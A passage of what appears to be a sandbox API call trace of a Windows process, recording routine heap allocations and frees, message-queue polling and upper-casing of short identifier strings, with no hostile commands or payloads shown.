out: lpMsg=0x8bf250) returned 0 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0159.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0159.311] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0159.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0159.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.312] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.312] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0159.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0159.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0159.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.312] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0159.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.313] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0159.313] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0159.313] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0159.313] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0159.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0159.313] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0159.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0159.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.314] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0159.314] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0159.314] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0159.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0159.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0159.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0159.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0159.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0159.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.315] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.315] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0159.316] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0159.316] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0159.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0159.316] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0159.317] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0159.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0159.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0159.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0159.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0159.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0159.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0159.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0159.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0159.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0159.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0159.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0159.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0159.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0159.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0159.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0159.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0159.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0159.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0159.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0159.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.319] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0159.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0159.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0159.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0159.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0159.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0159.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.320] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 